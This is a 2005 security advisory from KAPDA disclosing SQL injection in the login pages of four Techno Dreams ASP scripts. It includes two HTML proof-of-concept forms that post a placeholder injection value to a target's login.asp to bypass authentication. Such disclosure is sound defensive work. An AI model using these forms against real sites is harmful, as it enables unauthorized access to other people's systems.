[KAPDA::#9]Techno Dreams Scripts Vulnerabilities

KAPDA New advisory

Vulnerable products : 

Techno Dreams Announcement Script
Techno Dreams Guestbook Script
Techno Dreams Mailing List Script
Techno Dreams WebDirectory Script

Vendor: http://www.t-dreams.com/

Risk: High

Vulnerability: Sql injection

Date :
--------------------
2005/10/22

About Techno Dreams Scripts
--------------------
Techno Dreams Announcement Script 

     If you have a site and want to make a section for Announcements or 

   Recent News, then you might need this script.

Techno Dreams Guestbook Script 

     It uses MS Access with ability to be upgraded into SQL. Now, we've 

   added an Admin Area for the script.

Techno Dreams Mailing List Script : 

     Let your visitors join your mailing list... and send mass emails to all 

   of this list. Very good but simple ASP script (MS Access but SQL 

   upgradeable).


Techno Dreams WebDirectory :

     Simple yet effect search engine (if we could say about it; since it's 

   look like a web directory). With some advance features like approval, 

   hits, categories, advance search, admin area, what's new, new updated, 

   and what's hot...

	Vendor`s description : http://www.t-dreams.com/downloads.asp

Discussion :
----------------
  Several scripts do not properly validate user-supplied input. A remote 

user can create specially crafted parameter values that will execute 

SQL commands on the underlying database.

Vulnerabilities:
--------------------
Sql injection in /admin/login.asp (Announcement - Guestbook - 

WebDirectory)

Sql injection in /login.asp ( Mailing List)

at parameter named 'userid'. Attacker can enter SQL command to

 login as low-level user.(For all products)

Proof of Concepts:
--------------------

<html>
<h1>Techno Dreams Announcement - Guestbook - WebDirectory Script 
Login-Bypass PoC - Kapda `s advisory </h1>
<p> Discovery and exploit by farhadkey [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers 
Institute
of Iran</a></p>
<form method="POST" action="http://[target]/admin/login.asp">
<input type="hidden" name="userid" value="[SQL Injection]">
<input type="hidden" name="passwd" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>

<html>
<h1>Techno Dreams Mailing List Script Login-Bypass PoC - Kapda `s 
advisory </h1>
<p> Discovery and exploit by farhadkey [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers 
Institute
of Iran</a></p>
<form method="POST" action="http://[target]/login.asp">
<input type="hidden" name="userid" value="[SQL Injection}">
<input type="hidden" name="passwd" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>

Solution:
--------------------
No patch`s released yet by vendor.

More Detail:
--------------------
http://www.kapda.ir/advisory-103.html
Visit Above Link for more details.


Credit :
--------------------
Farhad Koosha of KAPDA
farhadkey [at} kapda.ir
Kapda - Security Science Researchers Insitute of Iran
http://www.KAPDA.ir
(PersianHacker.NET)